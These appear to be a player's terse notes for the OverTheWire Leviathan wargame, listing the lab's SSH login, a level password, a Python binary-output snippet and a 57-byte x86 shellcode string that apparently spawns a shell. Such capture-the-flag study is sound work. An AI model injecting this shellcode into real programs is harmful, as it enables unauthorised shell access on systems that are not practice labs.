https://overthewire.org/wargames

location
---------
http://leviathan[0-9]+.leviathan.labs.overthewire.org
/etc/leviathan_pass/leviathan[0-9]+
ssh leviathan0@leviathan.labs.overthewire.org -p 2223

passwords
---------
0: leviathan0
1: PPIfmI1qsA

robots.txt is a file like .gitignore but then for sites

// printing binary data in python3
import sys
sys.stdout.buffer.write(b"some binary data")

shellcode payload http://shell-storm.org/shellcode/files/shellcode-607.html
57 bytes
"\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"
"\\xeb\\x11\\x5e\\x31\\xc9\\xb1\\x21\\x80\\x6c\\x0e\\xff\\x01\\x80\\xe9\\x01\\x75\\xf6\\xeb\\x05\\xe8\\xea\\xff\\xff\\xff\\x6b\\x0c\\x59\\x9a\\x53\\x67\\x69\\x2e\\x71\\x8a\\xe2\\x53\\x6b\\x69\\x69\\x30\\x63\\x62\\x74\\x69\\x30\\x63\\x6a\\x6f\\x8a\\xe4\\x53\\x52\\x54\\x8a\\xe2\\xce\\x81"
